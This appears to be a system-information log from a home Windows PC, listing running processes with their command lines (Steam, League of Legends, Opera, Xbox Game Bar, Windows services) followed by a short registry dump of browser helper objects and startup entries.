"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" --type=renderer --field-trial-handle=1340,17224370070923997330,15258235204943688626,131072 --service-pipe-token=11363860252466549512 --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --lang=sk --log-file="C:\Program Files (x86)\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --buildid=1568566542 --steamid=0 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=11363860252466549512 --renderer-client-id=5 --mojo-platform-channel-handle=2456 /prefetch:1
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
C:\WINDOWS\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
"D:\Hry\Lol\LeagueClient.exe"
D:/Hry/Lol/LeagueClientUx.exe "--remoting-auth-token=Dt1nrU5H8jqvK46h9YfM2w" "--respawn-command=LeagueClient.exe" "--respawn-display-name=League of Legends" "--app-port=1991" "--install-directory=D:\Hry\Lol" "--app-name=LeagueClient" "--ux-name=LeagueClientUx" "--ux-helper-name=LeagueClientUxHelper" "--log-dir=LeagueClient Logs" "--bugsplat-name=league_client_riotgames_com" "--bugsplat-platform-id=EUN1" "--app-log-file-path=D:/Hry/Lol/Logs/LeagueClient Logs/2019-09-17T19-39-13_10800_LeagueClient.log" "--app-pid=10800" "--no-proxy-server"
LeagueClientUxRender.exe --type=gpu-process --channel="15328.0.369032621\461256165" --no-sandbox --lang=en-US --log-file="D:\Hry\Lol\debug.log" --supports-dual-gpus=false --gpu-driver-bug-workarounds=3,11,25,54,64 --gpu-vendor-id=0x10de --gpu-device-id=0x1be1 --gpu-driver-vendor=NVIDIA --gpu-driver-version=25.21.14.1935 --lang=en-US --log-file="D:\Hry\Lol\debug.log" /prefetch:2 --app-name=LeagueClient --ux-name=LeagueClientUx --ux-helper-name=LeagueClientUxHelper --log-dir="LeagueClient Logs" --bugsplat-name=league_client_riotgames_com --app-port=1991 --bugsplat-platform-id=EUN1 --app-log-file-path="D:/Hry/Lol/Logs/LeagueClient Logs/2019-09-17T19-39-13_10800_LeagueClient.log" --primary-ux-log-file-path="D:/Hry/Lol/Logs/LeagueClient Logs/2019-09-17T19-39-14_15328_LeagueClientUx.log"
LeagueClientUxRender.exe --type=renderer --no-sandbox --disable-databases --lang=en-US --lang=en-US --log-file="D:\Hry\Lol\debug.log" --disable-spell-checking --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="15328.1.617783350\247023444" /prefetch:1 --app-name=LeagueClient --ux-name=LeagueClientUx --ux-helper-name=LeagueClientUxHelper --log-dir="LeagueClient Logs" --bugsplat-name=league_client_riotgames_com --app-port=1991 --bugsplat-platform-id=EUN1 --app-log-file-path="D:/Hry/Lol/Logs/LeagueClient Logs/2019-09-17T19-39-13_10800_LeagueClient.log" --primary-ux-log-file-path="D:/Hry/Lol/Logs/LeagueClient Logs/2019-09-17T19-39-14_15328_LeagueClientUx.log"
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s XblAuthManager
"C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.32.20003.0_x64__8wekyb3d8bbwe\GameBar.exe" -ServerName:App.AppXbdkk0yrkwpcgeaem8zk81k8py1eaahny.mca
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
C:\WINDOWS\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Appinfo
"C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.32.20003.0_x64__8wekyb3d8bbwe\GameBarFT.exe" /InvokerPRAID: App
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --ran-launcher --started-from-shortcut
C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera_crashreporter.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\mifoI\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\mifoI\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=63.0.3368.88 --initial-client-data=0x314,0x318,0x31c,0x310,0x320,0x7ffb38c250d8,0x7ffb38c250e8,0x7ffb38c250f8
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=gpu-process --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --gpu-preferences=IAAAAAAAAADgAAAgAAAAAAAAYAAAAAAACAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAABQAAABAAAAAAAAAAAAAAAAYAAAAQAAAAAAAAAAEAAAAFAAAAEAAAAAAAAAABAAAABgAAAA== --service-request-channel-token=10952646169623674190 --mojo-platform-channel-handle=1940 --ignored=" --type=renderer " /prefetch:2
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=12942167864466852762 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --extension-process --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=16352397697600867579 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=10999903839821528110 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=5389395385881101640 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=14922372443869895025 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=17921168457726020141 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=4363660273099416433 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=2698598090611845681 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4688 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=4179691000690641985 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=14336163309440125437 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=12522871142897774421 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=2247399660793291289 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2136 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=10422825674242804883 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=5161709155148729808 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=1286202944140757033 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=13243714319719071075 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=337830959860573460 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=12408686498634295965 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=61718623262470148 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=15316193652336651057 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=4219128517967332957 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=5297882430120969586 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=16583315075997734365 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=10501879330689210723 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=11582778321910316157 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=7681336826519271721 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=16389578015494333646 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=4917263268551574944 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=499864311245100607 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7640 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --extension-process --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=991969027432883372 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8700 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --extension-process --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=8864918199960158199 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9892 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --extension-process --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=10254873077980346933 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --extension-process --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=2177196908495376924 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11140 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=4811793900206019507 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13064 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=3631296702206223476 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13024 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=4361963278463733579 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13812 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=7733712750112178050 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13508 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=8232681817187748643 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=14252 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=8936847654493154097 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=15700 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=15176401353476146866 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=14068 /prefetch:1
C:\WINDOWS\System32\svchost.exe -k netsvcs -p -s BITS
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=6913981474202254861 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13672 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=17005304665777573132 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=14472 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=9516366742041313259 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
"C:\Users\mifoI\AppData\Local\Programs\Opera\63.0.3368.88\opera.exe" --type=renderer --field-trial-handle=1928,13513236793531047680,1059173881257797867,131072 --lang=sk --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-test:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=10065902709938233601 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:1
"D:\Sťahovanie\scoped_dir12284_883695578\RSITx64.exe"
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssv.dll [2019-05-25 480120]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF}]
Microsoft SkyDrive Pro Browser Helper - C:\PROGRA~2\MICROS~1\Office15\GROOVEEX.DLL [2018-07-18 1744672]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2ssv.dll [2019-05-25 194424]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"=C:\WINDOWS\system32\SecurityHealthSystray.exe [2018-09-15 83968]
"RtkAudUService"=C:\WINDOWS\System32\RtkAudUService64.exe [2018-02-28 652736]
"WavesSvc"=C:\WINDOWS\System32\DriverStore\FileRepository\wavesapo.inf_amd64_1fb2e6862d041cad\WavesSvc64.exe [2018-01-26 1220320]
"IAStorIcon"=C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe [2018-01-30 79360]
